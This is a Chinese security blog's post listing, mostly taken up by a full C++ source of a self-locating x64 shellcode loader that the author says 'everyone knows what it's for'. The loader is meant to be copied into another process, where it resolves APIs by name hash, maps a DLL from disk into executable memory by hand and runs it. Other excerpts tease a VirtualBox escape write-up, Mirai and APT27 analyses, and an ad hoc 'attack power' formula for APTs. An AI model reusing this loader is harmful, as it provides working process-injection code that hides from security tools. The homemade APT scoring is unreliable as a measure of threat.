二进制安全渗透复现汇编Shellcode [2021]VirtualBox 6.1.16有限逃逸漏洞 这篇文章介绍针对当时最新可用版本(Windows 上为 VirtualBox 6.1.16)的 VirtualBox 虚拟机逃逸(guest-to-host escape)。我们的团队 Sauercl0ud 在 RealWorld CTF 2020/2021 比赛中发现并利用了这些漏洞。 该漏洞是组织者已知的:它要求攻击者能够在客户机(guest)内加载内核模块,并且在 VirtualBox 的默认配置下无法利用,因此实际影响非常有限。 非常感谢组织者举办这场精彩的比赛,特别感谢 ChenNan 出的这道题,感谢 M4x 一直很乐于助人、回答了我们的问题并陪我们完成了多次演示尝试,当然还有所有参与编写漏洞利用程序的人。 让我们来看看:D 阅读全文 2021-01-24 huoji 0 条评论
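二进制安全游戏安全渗透复现汇编Shellcode [2020]自定位+内存加载shellcode 可用于驱动+R3通用 用来干什么懂的都懂
```cpp
/*
 * Self-locating, in-memory DLL loader (x64, user mode).
 *
 * The byte range [RemoteLoadStart, RemoteLoadEnd) is copied into a target
 * process and run as raw shellcode. It locates kernel32/ntdll through the
 * PEB loader list, resolves the handful of APIs it needs by ROR-13 name hash,
 * reads a DLL from a hard-coded path, maps it by hand (headers, sections,
 * imports, base relocations) and calls DllMain(DLL_PROCESS_ATTACH).
 *
 * Build/usage notes (nothing below enforces them):
 *   - <windows.h> and <intrin.h> must already be included (IMAGE_* types,
 *     __readgsqword, _rotr).
 *   - x64 only: gs:[0x60] is the PEB, thunks are 8 bytes, relocs are DIR64.
 *   - RemoteLoadStart must not reference anything outside the blob: no
 *     string literals, no CRT, no switch statements (MSVC may lower a switch
 *     to a jump table in .rdata). API names are therefore built from
 *     immediates and the copies are plain byte loops. An optimiser can still
 *     rewrite those loops into a memcpy call - check the disassembly.
 *   - The PXE_*/PPE_*/PDE_*/PTE_* constants are paging self-map addresses
 *     kept for the author's kernel-mode variant; this user-mode listing does
 *     not use them.
 *
 * Limitations worth knowing before relying on it: TLS callbacks are not run,
 * no exception tables are registered (RtlAddFunctionTable), forwarded exports
 * are not followed, the image is mapped RWX with its PE headers intact, and
 * the module is never linked into the PEB - all of which are the usual
 * artefacts memory scanners look for when hunting manually mapped modules.
 */
#define HUOJI_POOL_TAG 'huoJ'

/* Byte length of the blob between two function symbols (start n, end f). */
#define CALCSIZE(n, f) ((ULONG_PTR)(f) - (ULONG_PTR)(n))
#ifndef PAGE_ALIGN
#define PAGE_ALIGN(Va) ((PVOID)((ULONG_PTR)(Va) & ~(PAGE_SIZE - 1)))
#endif

typedef HMODULE(WINAPI *LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI *GETPROCADDRESS)(HMODULE, LPCSTR);
typedef LPVOID(WINAPI *VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
typedef BOOL(WINAPI *VIRTUALFREE)(LPVOID, SIZE_T, DWORD);
typedef DWORD(NTAPI *NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
typedef BOOL(WINAPI *ReadFileT)(HANDLE, LPVOID, DWORD, LPDWORD, PVOID);
typedef HANDLE(WINAPI *CreateFileAT)(LPCSTR, DWORD, DWORD, PVOID, DWORD, DWORD, HANDLE);
typedef DWORD(WINAPI *GetFileSizeT)(HANDLE, LPDWORD);
typedef BOOL(WINAPI *CloseHandleT)(HANDLE);
typedef BOOL(WINAPI *DLLMAIN)(HINSTANCE, DWORD, LPVOID);

/* Raw memory accessors. The original listing used these without defining
 * them; they are the ones from Stephen Fewer's ReflectiveLoader.h. */
#ifndef DEREF
#define DEREF(name)    (*(ULONG_PTR *)(name))
#define DEREF_32(name) (*(DWORD *)(name))
#define DEREF_16(name) (*(WORD *)(name))
#endif

/* ROR-13 name hashes. Module hashes are computed over the raw UTF-16 bytes of
 * BaseDllName (ASCII-uppercased, NUL bytes included); export hashes over the
 * ASCII export name. The constants match the open-source ReflectiveLoader. */
#define KERNEL32DLL_HASH             0x6A4ABC5B
#define NTDLLDLL_HASH                0x3CFA685D
#define LOADLIBRARYA_HASH            0xEC0E4E8E
#define GETPROCADDRESS_HASH          0x7C0DFCAA
#define VIRTUALALLOC_HASH            0x91AFCA54
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
#define HASH_KEY 13

#ifndef DLL_PROCESS_ATTACH
#define DLL_PROCESS_ATTACH 1
#define DLL_THREAD_ATTACH  2
#define DLL_THREAD_DETACH  3
#define DLL_PROCESS_DETACH 0
#endif

/* x64 paging-structure self-map VAs (kernel mode only; unused here). */
#ifndef PXE_BASE
#define PXE_BASE 0xFFFFF6FB7DBED000UI64
#endif
#ifndef PXE_SELFMAP
#define PXE_SELFMAP 0xFFFFF6FB7DBEDF68UI64
#endif
#ifndef PPE_BASE
#define PPE_BASE 0xFFFFF6FB7DA00000UI64
#endif
#ifndef PDE_BASE
#define PDE_BASE 0xFFFFF6FB40000000UI64
#endif
#ifndef PTE_BASE
#define PTE_BASE 0xFFFFF68000000000UI64
#endif

/* Prefix of the loader's module record. Only InLoadOrderLinks, DllBase and
 * BaseDllName are read below, so the layout after BaseDllName is not
 * load-bearing. (Field spelled SizeOfImages in the original; kept.) */
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImages;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    union {
        LIST_ENTRY HashLinks;
        struct {
            PVOID SectionPointer;
            ULONG CheckSum;
        };
    };
    union {
        struct {
            ULONG TimeDateStamp;
        };
        struct {
            PVOID LoadedImports;
        };
    };
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/* One base-relocation entry: 12-bit page offset, 4-bit type. */
typedef struct {
    WORD offset : 12;
    WORD type : 4;
} IMAGE_RELOC, *PIMAGE_RELOC;

/*
 * Loader entry point. Deliberately a single function: the blob must be one
 * contiguous range with no calls outside it. Returns silently on any failure
 * (the original crashed or looped forever on most of them).
 */
VOID WINAPI RemoteLoadStart(void)
{
    LOADLIBRARYA            pLoadLibraryA = NULL;
    GETPROCADDRESS          pGetProcAddress = NULL;
    VIRTUALALLOC            pVirtualAlloc = NULL;
    VIRTUALFREE             pVirtualFree = NULL;
    NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
    ReadFileT               pReadFile = NULL;
    CreateFileAT            pCreateFile = NULL;
    GetFileSizeT            pGetFileSize = NULL;
    CloseHandleT            pCloseHandle = NULL;

    ULONG_PTR Kernel32Base = 0;
    ULONG_PTR uiListHead, uiEntry;
    ULONG_PTR uiBaseAddress = 0;   /* mapped image base                  */
    ULONG_PTR uiRawImage = 0;      /* file contents as read from disk    */
    ULONG_PTR uiHeaderValue = 0;   /* IMAGE_NT_HEADERS of the DLL        */
    ULONG_PTR uiDelta;             /* actual base - preferred ImageBase  */
    ULONG_PTR uiValueA, uiValueB, uiValueC, uiValueD, uiValueE;
    PVOID     dwStrings = NULL;    /* scratch page for API name strings  */
    HANDLE    hFile;
    DWORD     mSize, dwRead;
    BOOL      bLoaded = FALSE;

    /*
     * 1. Walk PEB->Ldr->InLoadOrderModuleList for kernel32.dll and ntdll.dll
     *    and pull LoadLibraryA / GetProcAddress / VirtualAlloc /
     *    NtFlushInstructionCache out of their export tables by name hash.
     */
    uiEntry    = __readgsqword(0x60);                          /* PEB                          */
    uiEntry    = *(PULONG_PTR)((PUCHAR)uiEntry + 0x18);         /* PEB->Ldr                     */
    uiListHead = uiEntry + 0x10;                                /* &Ldr->InLoadOrderModuleList  */
    uiEntry    = (ULONG_PTR)((PLIST_ENTRY)uiListHead)->Flink;   /* first LDR_DATA_TABLE_ENTRY   */

    /* The list is circular, so stop when it wraps back to the head instead
     * of spinning forever on a never-NULL Flink. */
    while (uiEntry && uiEntry != uiListHead) {
        PLDR_DATA_TABLE_ENTRY pEntry = (PLDR_DATA_TABLE_ENTRY)uiEntry;
        DWORD  dwModHash = 0;
        USHORT usLen     = pEntry->BaseDllName.Length;   /* byte count of UTF-16 */
        BYTE  *pName     = (BYTE *)pEntry->BaseDllName.Buffer;

        while (usLen--) {
            dwModHash = _rotr(dwModHash, HASH_KEY);
            dwModHash += (*pName >= 'a') ? (DWORD)(*pName - 0x20) : (DWORD)*pName;
            pName++;
        }

        if (dwModHash == KERNEL32DLL_HASH || dwModHash == NTDLLDLL_HASH) {
            BOOL      bIsKernel32 = (dwModHash == KERNEL32DLL_HASH);
            ULONG_PTR uiModBase   = (ULONG_PTR)pEntry->DllBase;
            PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(uiModBase + ((PIMAGE_DOS_HEADER)uiModBase)->e_lfanew);
            PIMAGE_EXPORT_DIRECTORY pExp = (PIMAGE_EXPORT_DIRECTORY)(uiModBase +
                pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
            ULONG_PTR uiNames    = uiModBase + pExp->AddressOfNames;
            ULONG_PTR uiOrdinals = uiModBase + pExp->AddressOfNameOrdinals;
            ULONG_PTR uiFuncs    = uiModBase + pExp->AddressOfFunctions;
            DWORD     dwLeft     = pExp->NumberOfNames;   /* never read past the name table */
            USHORT    usWanted   = bIsKernel32 ? 3 : 1;

            if (bIsKernel32)
                Kernel32Base = uiModBase;

            while (usWanted > 0 && dwLeft-- > 0) {
                char *c = (char *)(uiModBase + DEREF_32(uiNames));
                DWORD h = 0;

                /* 'register' dropped: it is an error in C++17 builds. */
                do {
                    h = _rotr(h, HASH_KEY);
                    h += *c;
                } while (*++c);

                if (bIsKernel32) {
                    if (h == LOADLIBRARYA_HASH || h == GETPROCADDRESS_HASH || h == VIRTUALALLOC_HASH) {
                        ULONG_PTR uiFn = uiModBase + DEREF_32(uiFuncs + DEREF_16(uiOrdinals) * sizeof(DWORD));
                        if (h == LOADLIBRARYA_HASH)
                            pLoadLibraryA = (LOADLIBRARYA)uiFn;
                        else if (h == GETPROCADDRESS_HASH)
                            pGetProcAddress = (GETPROCADDRESS)uiFn;
                        else
                            pVirtualAlloc = (VIRTUALALLOC)uiFn;
                        usWanted--;
                    }
                } else if (h == NTFLUSHINSTRUCTIONCACHE_HASH) {
                    pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiModBase +
                        DEREF_32(uiFuncs + DEREF_16(uiOrdinals) * sizeof(DWORD)));
                    usWanted--;
                }
                uiNames    += sizeof(DWORD);
                uiOrdinals += sizeof(WORD);
            }
        }

        if (pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache)
            break;
        uiEntry = DEREF(uiEntry);   /* InLoadOrderLinks.Flink */
    }

    if (!pLoadLibraryA || !pGetProcAddress || !pVirtualAlloc || !pNtFlushInstructionCache || !Kernel32Base)
        return;

    /*
     * 2. Resolve the remaining APIs by name. Names are assembled from 32-bit
     *    immediates so the blob carries no .rdata references. Each 8-byte
     *    store zero-extends its 4-byte value, so the last store of every name
     *    also writes the terminating NULs. The longest name needs 16 bytes of
     *    scratch; the original asked for 12 and only worked because the
     *    allocation is rounded up to a page.
     */
    dwStrings = pVirtualAlloc(NULL, 16, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!dwStrings)
        return;

    *(DWORD64 *)((PCHAR)dwStrings + 0x0) = 0x64616552;   /* "Read"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x4) = 0x656c6946;   /* "File" + NULs */
    pReadFile = (ReadFileT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings);

    *(DWORD64 *)((PCHAR)dwStrings + 0x0) = 0x61657243;   /* "Crea"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x4) = 0x69466574;   /* "teFi"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x8) = 0x41656c;     /* "leA" + NULs  */
    pCreateFile = (CreateFileAT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings);

    *(DWORD64 *)((PCHAR)dwStrings + 0x0) = 0x46746547;   /* "GetF"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x4) = 0x53656c69;   /* "ileS"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x8) = 0x657a69;     /* "ize" + NULs  */
    pGetFileSize = (GetFileSizeT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings);

    *(DWORD64 *)((PCHAR)dwStrings + 0x0) = 0x736f6c43;   /* "Clos"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x4) = 0x6e614865;   /* "eHan"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x8) = 0x656c64;     /* "dle" + NULs  */
    pCloseHandle = (CloseHandleT)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings);

    *(DWORD64 *)((PCHAR)dwStrings + 0x0) = 0x74726956;   /* "Virt"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x4) = 0x466c6175;   /* "ualF"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x8) = 0x656572;     /* "ree" + NULs  */
    pVirtualFree = (VIRTUALFREE)pGetProcAddress((HMODULE)Kernel32Base, (LPCSTR)dwStrings);

    if (!pReadFile || !pCreateFile || !pGetFileSize || !pCloseHandle || !pVirtualFree)
        goto cleanup;

    /*
     * 3. Read the DLL. The bytes spell "C:/test.dll" (forward slash, which
     *    Win32 accepts): 433a2f74 6573742e 646c6c. Change them to your path.
     */
    *(DWORD64 *)((PCHAR)dwStrings + 0x0) = 0x742f3a43;   /* "C:/t"        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x4) = 0x2e747365;   /* "est."        */
    *(DWORD64 *)((PCHAR)dwStrings + 0x8) = 0x6c6c64;     /* "dll" + NULs  */
    hFile = pCreateFile((LPCSTR)dwStrings, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                        NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        goto cleanup;

    /* High DWORD of the size is ignored: a DLL over 4 GiB is not expected. */
    mSize = pGetFileSize(hFile, NULL);
    if (mSize == INVALID_FILE_SIZE || mSize < sizeof(IMAGE_DOS_HEADER)) {
        pCloseHandle(hFile);
        goto cleanup;
    }

    /* The raw file is only read from; it does not need to be executable. */
    uiRawImage = (ULONG_PTR)pVirtualAlloc(NULL, mSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!uiRawImage) {
        pCloseHandle(hFile);
        goto cleanup;
    }

    /* ReadFile requires lpNumberOfBytesRead when lpOverlapped is NULL; the
     * original passed NULL for both, which the API documents as invalid. */
    dwRead = 0;
    if (!pReadFile(hFile, (LPVOID)uiRawImage, mSize, &dwRead, NULL) || dwRead != mSize) {
        pCloseHandle(hFile);
        goto cleanup;
    }
    pCloseHandle(hFile);

    /*
     * 4. Minimal header sanity checks before trusting any offset in them:
     *    DOS/PE signatures, PE32+, headers fit in the file and the image.
     *    This is not a full PE validator.
     */
    if (((PIMAGE_DOS_HEADER)uiRawImage)->e_magic != IMAGE_DOS_SIGNATURE)
        goto cleanup;
    uiValueA = (ULONG_PTR)((PIMAGE_DOS_HEADER)uiRawImage)->e_lfanew;   /* negative e_lfanew wraps huge and fails below */
    if (uiValueA + sizeof(IMAGE_NT_HEADERS) > mSize)
        goto cleanup;
    uiHeaderValue = uiRawImage + uiValueA;
    if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature != IMAGE_NT_SIGNATURE ||
        ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC ||
        ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders > mSize ||
        ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders >
            ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage)
        goto cleanup;

    /* Section table must lie inside the headers that are about to be copied. */
    uiValueA = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader
               + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader;
    uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
    if ((uiValueA - uiRawImage) + uiValueE * sizeof(IMAGE_SECTION_HEADER) >
        ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders)
        goto cleanup;

    /* NOTE(review): the whole image is RWX, which is more than the DLL needs
     * and an easy thing for memory scanners to flag. Per-section protections
     * would need VirtualProtect after the relocation pass; left as-is to keep
     * the loader small. */
    uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage,
                                             MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!uiBaseAddress)
        goto cleanup;

    /* Copy the headers verbatim (this leaves an "MZ" at the start of the
     * private region - a well-known hunting signature). */
    uiValueD = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
    uiValueB = uiRawImage;
    uiValueC = uiBaseAddress;
    while (uiValueD--)
        *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;

    /* Copy each section's raw data to its virtual address. A section that
     * falls outside the file or the image (truncated or corrupt input) aborts
     * the load instead of reading or writing out of bounds. */
    while (uiValueE--) {
        PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)uiValueA;
        uiValueD = pSec->SizeOfRawData;
        if ((ULONG_PTR)pSec->PointerToRawData + uiValueD > mSize ||
            (ULONG_PTR)pSec->VirtualAddress + uiValueD >
                ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage)
            goto cleanup;
        uiValueB = uiBaseAddress + pSec->VirtualAddress;
        uiValueC = uiRawImage + pSec->PointerToRawData;
        while (uiValueD--)
            *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
        uiValueA += sizeof(IMAGE_SECTION_HEADER);
    }

    /* From here on read the headers from the mapped copy so the raw file can
     * be released now. The original kept a second full RWX copy of the DLL
     * alive for the life of the process and then lost the pointer to it. */
    uiHeaderValue = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
    pVirtualFree((LPVOID)uiRawImage, 0, MEM_RELEASE);
    uiRawImage = 0;

    /*
     * 5. Resolve imports. Lookup entries come from OriginalFirstThunk when
     *    the descriptor has one; otherwise the IAT itself still holds the
     *    unbound entries. (The original computed base + 0 for a missing OFT
     *    and so always dereferenced the DOS header; it happened to work only
     *    because "MZ" never carries the ordinal flag.) A DLL with no import
     *    directory is now handled instead of walking the DOS header as a
     *    descriptor.
     */
    uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size) {
        uiValueC = uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress;
        while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name) {
            PIMAGE_IMPORT_DESCRIPTOR pDesc = (PIMAGE_IMPORT_DESCRIPTOR)uiValueC;
            ULONG_PTR uiLib    = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + pDesc->Name));
            ULONG_PTR uiIat    = uiBaseAddress + pDesc->FirstThunk;                       /* written */
            ULONG_PTR uiLookup = pDesc->OriginalFirstThunk                               /* read    */
                                     ? uiBaseAddress + pDesc->OriginalFirstThunk : uiIat;

            if (!uiLib)
                goto cleanup;   /* missing dependency: fail the load like the real loader does */

            while (DEREF(uiLookup)) {
                ULONG_PTR uiThunk = DEREF(uiLookup);
                ULONG_PTR uiFn;

                if (uiThunk & IMAGE_ORDINAL_FLAG) {
                    /* Import by ordinal: index AddressOfFunctions directly.
                     * Forwarded exports are not followed on this path. */
                    PIMAGE_NT_HEADERS pLibNt = (PIMAGE_NT_HEADERS)(uiLib + ((PIMAGE_DOS_HEADER)uiLib)->e_lfanew);
                    PIMAGE_EXPORT_DIRECTORY pLibExp = (PIMAGE_EXPORT_DIRECTORY)(uiLib +
                        pLibNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
                    ULONG_PTR uiFuncs = uiLib + pLibExp->AddressOfFunctions;
                    uiFn = uiLib + DEREF_32(uiFuncs + (IMAGE_ORDINAL(uiThunk) - pLibExp->Base) * sizeof(DWORD));
                } else {
                    uiFn = (ULONG_PTR)pGetProcAddress((HMODULE)uiLib,
                        (LPCSTR)((PIMAGE_IMPORT_BY_NAME)(uiBaseAddress + uiThunk))->Name);
                }
                if (!uiFn)
                    goto cleanup;   /* the original silently stored NULL in the IAT */
                DEREF(uiIat) = uiFn;
                uiIat    += sizeof(ULONG_PTR);
                uiLookup += sizeof(ULONG_PTR);
            }
            uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
        }
    }

    /*
     * 6. Apply base relocations for the delta between the preferred ImageBase
     *    and where the image landed. Type 0 (ABSOLUTE) entries are alignment
     *    padding and fall through untouched. An if-chain is used rather than
     *    a switch on purpose (see the header comment).
     */
    uiDelta  = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
    uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    if (uiDelta && ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size) {
        uiValueC = uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress;
        while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock) {
            uiValueA = uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress;   /* page being patched */
            uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
            uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);                              /* first IMAGE_RELOC  */
            while (uiValueB--) {
                PIMAGE_RELOC pRel = (PIMAGE_RELOC)uiValueD;
                ULONG_PTR uiTarget = uiValueA + pRel->offset;
                if (pRel->type == IMAGE_REL_BASED_DIR64)
                    *(ULONG_PTR *)uiTarget += uiDelta;
                else if (pRel->type == IMAGE_REL_BASED_HIGHLOW)
                    *(DWORD *)uiTarget += (DWORD)uiDelta;
                else if (pRel->type == IMAGE_REL_BASED_HIGH)
                    *(WORD *)uiTarget += HIWORD(uiDelta);
                else if (pRel->type == IMAGE_REL_BASED_LOW)
                    *(WORD *)uiTarget += LOWORD(uiDelta);
                uiValueD += sizeof(IMAGE_RELOC);
            }
            uiValueC += ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
        }
    }

    /*
     * 7. Call DllMain(DLL_PROCESS_ATTACH). The instruction cache is flushed
     *    first because the code bytes were written with ordinary stores. The
     *    original jumped to base + 0 when the DLL had no entry point; now the
     *    call is skipped. DllMain's return value is ignored, as before.
     */
    uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint;
    if (uiValueA) {
        pNtFlushInstructionCache((HANDLE)-1, NULL, 0);
        ((DLLMAIN)(uiBaseAddress + uiValueA))((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL);
    }
    bLoaded = TRUE;   /* the mapping now belongs to the running DLL; never free it */

cleanup:
    if (pVirtualFree) {
        if (uiRawImage)
            pVirtualFree((LPVOID)uiRawImage, 0, MEM_RELEASE);
        if (!bLoaded && uiBaseAddress)
            pVirtualFree((LPVOID)uiBaseAddress, 0, MEM_RELEASE);
        pVirtualFree(dwStrings, 0, MEM_RELEASE);
    }
}

/*
 * End-of-blob sentinel: the loader is extracted as
 * CALCSIZE(RemoteLoadStart, RemoteLoadEnd) bytes from RemoteLoadStart. That
 * assumes the compiler emits the two functions adjacently and in source order
 * (whole-program optimisation, incremental linking and function reordering
 * can all break it - verify the extracted size against the disassembly).
 * The return value has no meaning; presumably it is just distinctive enough
 * to keep the stub from being folded into another identical one.
 */
int RemoteLoadEnd(void)
{
    return 0x77132;
}
```
阅读全文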
2020-12-27 huoji 0 条评论
phppython渗透案例web安全javaJavaScript二进制安全无线安全csshtml游戏安全C/C++渗透复现一线开发易语言汇编Shellcode 《网络安全从浅入深百科全书》信息篇 word版本 ## 注意:下面的文字版主要目的是SEO,排版并不好看,建议看word版本: word版本(推荐阅读): [《网络安全从浅入深百科全书》信息篇.docx](https://key08.com/usr/uploads/2020/12/4020023684.docx) word在线阅读,无需下载,点击链接直接阅读: https://docs.qq.com/doc/DWndvTUh5YUp4UGV2?pub=1&dver=2.1.0 文字版(主要为SEO,排版并不好看): 阅读全文 2020-12-21 huoji 0 条评论
二进制安全渗透复现C/C++易语言 [2020]CVE-2018-8897 原理深度漫游、漏洞利用、调试实战 [CVE-2018-8897 原理深度漫游、漏洞利用、调试实战.pdf](https://key08.com/usr/uploads/2020/12/374400346.pdf) 阅读全文 2020-12-09 huoji 0 条评论
web安全渗透复现 [2018]LuckyMouse APT攻击行动评估 1) LuckyMouse行动是一项针对中亚国家数据中心的持续活动,这意味着攻击者获得了广泛的政府相关的资源。 2) LuckyMouse黑客组织也被称为Iron Tiger、EmissaryPanda或者APT27,今年早些时候也被发现使用比特币挖矿软件对亚洲多个国家实施网络攻击。该组织从2010年开始活跃, 之前从美国的国防项目承包商中窃取了大量数据 Symptoms 相关样本信息: 22CBE2B0F1EF3F2B18B4C5AED6D7BB79 0D0320878946A73749111E6C94BF1525 ac337bd5f6f18b8fe009e45d65a2b09b 04dece2662f648f619d9c0377a7ba7c0 最小闭合的攻击样本: 初始的感染向量未知,预估100k dropper:22cbe2b0f1ef3f2b18b4c5aed6d7bb79,size = 123521 backdoor:04dece2662f648f619d9c0377a7ba7c0 ,size = 81920 攻击能力计算: K = 2 (正常安全认知范围) a = 3 (无交互) s = 1 (鱼叉式钓鱼攻击或水坑攻击) m = 4 (代码注入,特种木马,特殊持久化隐藏,特定目标感染) p = 1 (攻击1种平台,windows) x = 2+2 (使用Nday漏洞 CVE-2017-11882(Office 公式编辑器,见参考1),web入侵方式) 攻击能力 = (a+s+m+p)^(k) * (1+x)^ 2 + c AT = (3 + 1 + 4 + 1) ^ 2 * (1+2+2) ^ 2 + (123521+81920)/1024 + 100 = 9^2 * (5^2)+ 300 = 2025+300 = 2325 ==>2325*1000/1279625(1T攻击力单位) =1.816T 参考引用: 1.https://securelist.com/luckymouse-hits-national-data-center/86083/ 2.https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/ 3.http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states 4.《论高级威胁的本质及攻击能力的量化研究》- www.vxjump.net/files/aptr/aptr.txt 阅读全文 2020-09-27 huoji 0 条评论
二进制安全渗透复现Shellcode [2015]CVE-2015-2387ATMFD分析 就是那个大名鼎鼎的hacking team泄露的内核提权0day [stuxnet_about2_3.pdf](https://key08.com/usr/uploads/2020/08/3986559131.pdf) 阅读全文 2020-08-18 huoji 0 条评论
渗透案例二进制安全渗透复现Shellcode [2019]两起僵尸网络Mirai样本分析 [TOC] ### 概述 2019年6月26日蜜罐系统监控到两起Mirai的物联网蠕虫活动情况。自2017年11月23日Check Point研究人员发现华为家用路由器HG532存在0day漏洞(CVE-2017-17215,可远程执行任意代码)以来,Mirai蠕虫就一直利用该漏洞大肆传播。本文会结合蜜罐捕获的攻击证据对该蠕虫进行技术分析,重点分析该蠕虫是如何利用该漏洞进行传播的。整个攻击流程如下 阅读全文 2019-12-24 夜里猛 0 条评论